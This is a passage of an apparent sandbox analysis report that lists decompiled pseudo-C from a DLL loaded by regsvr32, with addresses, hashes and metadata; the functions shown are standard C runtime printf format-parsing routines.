                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000001;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000002;
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				asm("bts eax, 0x7");
                                                                                                                                            				goto 0x65d0bd7d;
                                                                                                                                            				_a80 = _a80 | 0x00000008;
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0bdbe;
                                                                                                                                            				_t191 =  &_a1112;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t191);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0bdbc;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0bdd5;
                                                                                                                                            				_a88 = _t171 + _t191 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0be16;
                                                                                                                                            				_t192 =  &_a1112;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t192);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0be14;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0be2d;
                                                                                                                                            				_a116 = _t171 + _t192 - 0x30;
                                                                                                                                            				_a972 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a972 == 0x49) goto 0x65d0beb7;
                                                                                                                                            				if (_a972 == 0x68) goto 0x65d0bfc0;
                                                                                                                                            				if (_a972 == 0x6c) goto 0x65d0be76;
                                                                                                                                            				if (_a972 == 0x77) goto 0x65d0bfcd;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				if ( *_a1096 != 0x6c) goto 0x65d0bea7;
                                                                                                                                            				_a1096 = _a1096 + 1;
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0beb2;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if ( *_a1096 != 0x36) goto 0x65d0bf09;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x65d0bf09;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 != 0x33) goto 0x65d0bf4c;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x65d0bf4c;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 == 0x64) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x69) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x6f) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x75) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x78) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 != 0x58) goto 0x65d0bfae;
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				_a704 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0BB66;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0bd02
                                                                                                                                            0x7ffc65d0bd11
                                                                                                                                            0x7ffc65d0bd1b
                                                                                                                                            0x7ffc65d0bd25
                                                                                                                                            0x7ffc65d0bd2f
                                                                                                                                            0x7ffc65d0bd39
                                                                                                                                            0x7ffc65d0bd3b
                                                                                                                                            0x7ffc65d0bd44
                                                                                                                                            0x7ffc65d0bd48
                                                                                                                                            0x7ffc65d0bd51
                                                                                                                                            0x7ffc65d0bd55
                                                                                                                                            0x7ffc65d0bd5e
                                                                                                                                            0x7ffc65d0bd62
                                                                                                                                            0x7ffc65d0bd68
                                                                                                                                            0x7ffc65d0bd70
                                                                                                                                            0x7ffc65d0bd79
                                                                                                                                            0x7ffc65d0bd8d
                                                                                                                                            0x7ffc65d0bd8f
                                                                                                                                            0x7ffc65d0bd9c
                                                                                                                                            0x7ffc65d0bda5
                                                                                                                                            0x7ffc65d0bdae
                                                                                                                                            0x7ffc65d0bdb8
                                                                                                                                            0x7ffc65d0bdbc
                                                                                                                                            0x7ffc65d0bdd1
                                                                                                                                            0x7ffc65d0bdda
                                                                                                                                            0x7ffc65d0bdf2
                                                                                                                                            0x7ffc65d0bdf4
                                                                                                                                            0x7ffc65d0be01
                                                                                                                                            0x7ffc65d0be0a
                                                                                                                                            0x7ffc65d0be0c
                                                                                                                                            0x7ffc65d0be14
                                                                                                                                            0x7ffc65d0be29
                                                                                                                                            0x7ffc65d0be3a
                                                                                                                                            0x7ffc65d0be49
                                                                                                                                            0x7ffc65d0be53
                                                                                                                                            0x7ffc65d0be61
                                                                                                                                            0x7ffc65d0be6b
                                                                                                                                            0x7ffc65d0be71
                                                                                                                                            0x7ffc65d0be84
                                                                                                                                            0x7ffc65d0be91
                                                                                                                                            0x7ffc65d0be9d
                                                                                                                                            0x7ffc65d0bea5
                                                                                                                                            0x7ffc65d0beae
                                                                                                                                            0x7ffc65d0beb2
                                                                                                                                            0x7ffc65d0bebb
                                                                                                                                            0x7ffc65d0bed1
                                                                                                                                            0x7ffc65d0bee2
                                                                                                                                            0x7ffc65d0bef0
                                                                                                                                            0x7ffc65d0befc
                                                                                                                                            0x7ffc65d0bf04
                                                                                                                                            0x7ffc65d0bf17
                                                                                                                                            0x7ffc65d0bf28
                                                                                                                                            0x7ffc65d0bf36
                                                                                                                                            0x7ffc65d0bf42
                                                                                                                                            0x7ffc65d0bf4a
                                                                                                                                            0x7ffc65d0bf5a
                                                                                                                                            0x7ffc65d0bf6a
                                                                                                                                            0x7ffc65d0bf7a
                                                                                                                                            0x7ffc65d0bf8a
                                                                                                                                            0x7ffc65d0bf9a
                                                                                                                                            0x7ffc65d0bfaa
                                                                                                                                            0x7ffc65d0bfac
                                                                                                                                            0x7ffc65d0bfae
                                                                                                                                            0x7ffc65d0bfb9
                                                                                                                                            0x7ffc65d0bfbe
                                                                                                                                            0x7ffc65d0bfc7
                                                                                                                                            0x7ffc65d0bfcb
                                                                                                                                            0x7ffc65d0bfd1
                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$0$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 530996419-4087627031
                                                                                                                                            • Opcode ID: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                                                                            • Instruction ID: 68e161318c2534d18e67de5b64741f0dbc0f0538511a9abb2e27984f616b210b
                                                                                                                                            • Opcode Fuzzy Hash: 287329bbe28ac3486ddbb9e235f19a10cbf988fa35318df4d11335d2ff3f0aeb
                                                                                                                                            • Instruction Fuzzy Hash: 82512A6290C6EADAF3B5CF14E1543BEB7A4EB84B44F200935D28D86AD9DB6CD541CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 27%
                                                                                                                                            			E00007FFC7FFC65D0DCA8(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                                                                            				void* _t171;
                                                                                                                                            				char* _t191;
                                                                                                                                            				char* _t192;
                                                                                                                                            
                                                                                                                                            				_a1404 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1404 == 0x20) goto 0x65d0dd05;
                                                                                                                                            				if (_a1404 == 0x23) goto 0x65d0dd12;
                                                                                                                                            				if (_a1404 == 0x2b) goto 0x65d0dcf8;
                                                                                                                                            				if (_a1404 == 0x2d) goto 0x65d0dceb;
                                                                                                                                            				if (_a1404 == 0x30) goto 0x65d0dd20;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000001;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000002;
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				asm("bts eax, 0x7");
                                                                                                                                            				goto 0x65d0dd2b;
                                                                                                                                            				_a80 = _a80 | 0x00000008;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0dd6c;
                                                                                                                                            				_t191 =  &_a1560;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t191);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0dd6a;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0dd83;
                                                                                                                                            				_a88 = _t171 + _t191 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0ddc4;
                                                                                                                                            				_t192 =  &_a1560;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t192);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0ddc2;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0dddb;
                                                                                                                                            				_a116 = _t171 + _t192 - 0x30;
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x65d0df5d;
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				_a1216 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0DC41;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a1412 = _a1208 & 0x0000ffff;
                                                                                                                                            				_a1412 = _a1412 - 0x41;
                                                                                                                                            				if (_a1412 - 0x37 > 0) goto 0x65d0ea2a;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0dcb0
                                                                                                                                            0x7ffc65d0dcbf
                                                                                                                                            0x7ffc65d0dcc9
                                                                                                                                            0x7ffc65d0dcd3
                                                                                                                                            0x7ffc65d0dcdd
                                                                                                                                            0x7ffc65d0dce7
                                                                                                                                            0x7ffc65d0dce9
                                                                                                                                            0x7ffc65d0dcf2
                                                                                                                                            0x7ffc65d0dcf6
                                                                                                                                            0x7ffc65d0dcff
                                                                                                                                            0x7ffc65d0dd03
                                                                                                                                            0x7ffc65d0dd0c
                                                                                                                                            0x7ffc65d0dd10
                                                                                                                                            0x7ffc65d0dd16
                                                                                                                                            0x7ffc65d0dd1e
                                                                                                                                            0x7ffc65d0dd27
                                                                                                                                            0x7ffc65d0dd3b
                                                                                                                                            0x7ffc65d0dd3d
                                                                                                                                            0x7ffc65d0dd4a
                                                                                                                                            0x7ffc65d0dd53
                                                                                                                                            0x7ffc65d0dd5c
                                                                                                                                            0x7ffc65d0dd66
                                                                                                                                            0x7ffc65d0dd6a
                                                                                                                                            0x7ffc65d0dd7f
                                                                                                                                            0x7ffc65d0dd88
                                                                                                                                            0x7ffc65d0dda0
                                                                                                                                            0x7ffc65d0dda2
                                                                                                                                            0x7ffc65d0ddaf
                                                                                                                                            0x7ffc65d0ddb8
                                                                                                                                            0x7ffc65d0ddba
                                                                                                                                            0x7ffc65d0ddc2
                                                                                                                                            0x7ffc65d0ddd7
                                                                                                                                            0x7ffc65d0dde8
                                                                                                                                            0x7ffc65d0ddf7
                                                                                                                                            0x7ffc65d0de01
                                                                                                                                            0x7ffc65d0de0f
                                                                                                                                            0x7ffc65d0de19
                                                                                                                                            0x7ffc65d0de1f
                                                                                                                                            0x7ffc65d0de32
                                                                                                                                            0x7ffc65d0de40
                                                                                                                                            0x7ffc65d0de4c
                                                                                                                                            0x7ffc65d0de54
                                                                                                                                            0x7ffc65d0de5d
                                                                                                                                            0x7ffc65d0de61
                                                                                                                                            0x7ffc65d0de6a
                                                                                                                                            0x7ffc65d0de80
                                                                                                                                            0x7ffc65d0de91
                                                                                                                                            0x7ffc65d0de9f
                                                                                                                                            0x7ffc65d0deab
                                                                                                                                            0x7ffc65d0deb3
                                                                                                                                            0x7ffc65d0dec6
                                                                                                                                            0x7ffc65d0ded7
                                                                                                                                            0x7ffc65d0dee5
                                                                                                                                            0x7ffc65d0def1
                                                                                                                                            0x7ffc65d0def9
                                                                                                                                            0x7ffc65d0df09
                                                                                                                                            0x7ffc65d0df19
                                                                                                                                            0x7ffc65d0df29
                                                                                                                                            0x7ffc65d0df39
                                                                                                                                            0x7ffc65d0df49
                                                                                                                                            0x7ffc65d0df59
                                                                                                                                            0x7ffc65d0df5b
                                                                                                                                            0x7ffc65d0df5d
                                                                                                                                            0x7ffc65d0df68
                                                                                                                                            0x7ffc65d0df6d
                                                                                                                                            0x7ffc65d0df76
                                                                                                                                            0x7ffc65d0df7a
                                                                                                                                            0x7ffc65d0df80
                                                                                                                                            0x7ffc65d0df95
                                                                                                                                            0x7ffc65d0dfa6
                                                                                                                                            0x7ffc65d0dfb5
                                                                                                                                            0x7ffc65d0dfdc

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$0$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 530996419-1247675978
                                                                                                                                            • Opcode ID: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                                                                            • Instruction ID: be152d16547f64332b8dc272b76bbc0d68b2cddf713bae4a0ba3f5df0a9e13f3
                                                                                                                                            • Opcode Fuzzy Hash: dafc102d997b2a6b976dbf7f56485c8afddec954203f225463beab32e96cec62
                                                                                                                                            • Instruction Fuzzy Hash: F0514EB290C6EACAE3749F14E5403BAB7A0FB84755F200936D68D86AD8DB7CD441DF24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                            			E00007FFC7FFC65D0BD82(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                                                                                            				void* _t139;
                                                                                                                                            				char* _t159;
                                                                                                                                            				char* _t160;
                                                                                                                                            
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0bdbe;
                                                                                                                                            				_t159 =  &_a1112;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t159);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0bdbc;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0bdd5;
                                                                                                                                            				_a88 = _t139 + _t159 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if (_a696 != 0x2a) goto 0x65d0be16;
                                                                                                                                            				_t160 =  &_a1112;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t160);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0be14;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0be2d;
                                                                                                                                            				_a116 = _t139 + _t160 - 0x30;
                                                                                                                                            				_a972 = _a696 & 0x000000ff;
                                                                                                                                            				if (_a972 == 0x49) goto 0x65d0beb7;
                                                                                                                                            				if (_a972 == 0x68) goto 0x65d0bfc0;
                                                                                                                                            				if (_a972 == 0x6c) goto 0x65d0be76;
                                                                                                                                            				if (_a972 == 0x77) goto 0x65d0bfcd;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				if ( *_a1096 != 0x6c) goto 0x65d0bea7;
                                                                                                                                            				_a1096 = _a1096 + 1;
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0beb2;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if ( *_a1096 != 0x36) goto 0x65d0bf09;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x65d0bf09;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 != 0x33) goto 0x65d0bf4c;
                                                                                                                                            				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x65d0bf4c;
                                                                                                                                            				_a1096 = _a1096 + 2;
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				if ( *_a1096 == 0x64) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x69) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x6f) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x75) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 == 0x78) goto 0x65d0bfac;
                                                                                                                                            				if ( *_a1096 != 0x58) goto 0x65d0bfae;
                                                                                                                                            				goto 0x65d0bfbe;
                                                                                                                                            				_a704 = 0;
                                                                                                                                            				goto E00007FFC7FFC65D0BB66;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				_a80 = _a80 | 0x00000020;
                                                                                                                                            				goto 0x65d0bfd9;
                                                                                                                                            				asm("bts eax, 0xb");
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}






                                                                                                                                            0x7ffc65d0bd8d
                                                                                                                                            0x7ffc65d0bd8f
                                                                                                                                            0x7ffc65d0bd9c
                                                                                                                                            0x7ffc65d0bda5
                                                                                                                                            0x7ffc65d0bdae
                                                                                                                                            0x7ffc65d0bdb8
                                                                                                                                            0x7ffc65d0bdbc
                                                                                                                                            0x7ffc65d0bdd1
                                                                                                                                            0x7ffc65d0bdda
                                                                                                                                            0x7ffc65d0bdf2
                                                                                                                                            0x7ffc65d0bdf4
                                                                                                                                            0x7ffc65d0be01
                                                                                                                                            0x7ffc65d0be0a
                                                                                                                                            0x7ffc65d0be0c
                                                                                                                                            0x7ffc65d0be14
                                                                                                                                            0x7ffc65d0be29
                                                                                                                                            0x7ffc65d0be3a
                                                                                                                                            0x7ffc65d0be49
                                                                                                                                            0x7ffc65d0be53
                                                                                                                                            0x7ffc65d0be61
                                                                                                                                            0x7ffc65d0be6b
                                                                                                                                            0x7ffc65d0be71
                                                                                                                                            0x7ffc65d0be84
                                                                                                                                            0x7ffc65d0be91
                                                                                                                                            0x7ffc65d0be9d
                                                                                                                                            0x7ffc65d0bea5
                                                                                                                                            0x7ffc65d0beae
                                                                                                                                            0x7ffc65d0beb2
                                                                                                                                            0x7ffc65d0bebb
                                                                                                                                            0x7ffc65d0bed1
                                                                                                                                            0x7ffc65d0bee2
                                                                                                                                            0x7ffc65d0bef0
                                                                                                                                            0x7ffc65d0befc
                                                                                                                                            0x7ffc65d0bf04
                                                                                                                                            0x7ffc65d0bf17
                                                                                                                                            0x7ffc65d0bf28
                                                                                                                                            0x7ffc65d0bf36
                                                                                                                                            0x7ffc65d0bf42
                                                                                                                                            0x7ffc65d0bf4a
                                                                                                                                            0x7ffc65d0bf5a
                                                                                                                                            0x7ffc65d0bf6a
                                                                                                                                            0x7ffc65d0bf7a
                                                                                                                                            0x7ffc65d0bf8a
                                                                                                                                            0x7ffc65d0bf9a
                                                                                                                                            0x7ffc65d0bfaa
                                                                                                                                            0x7ffc65d0bfac
                                                                                                                                            0x7ffc65d0bfae
                                                                                                                                            0x7ffc65d0bfb9
                                                                                                                                            0x7ffc65d0bfbe
                                                                                                                                            0x7ffc65d0bfc7
                                                                                                                                            0x7ffc65d0bfcb
                                                                                                                                            0x7ffc65d0bfd1
                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2576288505-192189897
                                                                                                                                            • Opcode ID: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                                                                            • Instruction ID: cd01ff65a9f51e6c2ce126e895e321f731a793350ebd71033d9d5929f5b5454f
                                                                                                                                            • Opcode Fuzzy Hash: b576c27c8c875c1ce4182572011a22670079dadd40bff06c5e4b49d8cc0733f6
                                                                                                                                            • Instruction Fuzzy Hash: 20515C6290C6EACAE774DF10E5943BEB7A4EB84754F600935D28D82AE9DF6CD141CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                            			E00007FFC7FFC65D0DD30(signed int _a80, signed int _a88, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                                                                                            				void* _t139;
                                                                                                                                            				char* _t159;
                                                                                                                                            				char* _t160;
                                                                                                                                            
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0dd6c;
                                                                                                                                            				_t159 =  &_a1560;
                                                                                                                                            				_a88 = E00007FFC7FFC65D01E40(_t159);
                                                                                                                                            				if (_a88 >= 0) goto 0x65d0dd6a;
                                                                                                                                            				_a80 = _a80 | 0x00000004;
                                                                                                                                            				_a88 =  ~_a88;
                                                                                                                                            				goto 0x65d0dd83;
                                                                                                                                            				_a88 = _t139 + _t159 - 0x30;
                                                                                                                                            				_a116 = 0;
                                                                                                                                            				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x65d0ddc4;
                                                                                                                                            				_t160 =  &_a1560;
                                                                                                                                            				_a116 = E00007FFC7FFC65D01E40(_t160);
                                                                                                                                            				if (_a116 >= 0) goto 0x65d0ddc2;
                                                                                                                                            				_a116 = 0xffffffff;
                                                                                                                                            				goto 0x65d0dddb;
                                                                                                                                            				_a116 = _t139 + _t160 - 0x30;
                                                                                                                                            				_a1408 = _a1208 & 0x0000ffff;
                                                                                                                                            				if (_a1408 == 0x49) goto 0x65d0de66;
                                                                                                                                            				if (_a1408 == 0x68) goto 0x65d0df6f;
                                                                                                                                            				if (_a1408 == 0x6c) goto 0x65d0de24;
                                                                                                                                            				if (_a1408 == 0x77) goto 0x65d0df7c;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x65d0de56;
                                                                                                                                            				_a1544 =  &(_a1544[1]);
                                                                                                                                            				asm("bts eax, 0xc");
                                                                                                                                            				goto 0x65d0de61;
                                                                                                                                            				_a80 = _a80 | 0x00000010;
                                                                                                                                            				goto 0x65d0df88;
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x65d0deb8;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x65d0deb8;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("bts eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x65d0defb;
                                                                                                                                            				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x65d0defb;
                                                                                                                                            				_a1544 =  &(_a1544[2]);
                                                                                                                                            				asm("btr eax, 0xf");
                                                                                                                                            				goto 0x65d0df6d;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x65d0df5b;
                                                                                                                                            				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x65d0df5b;
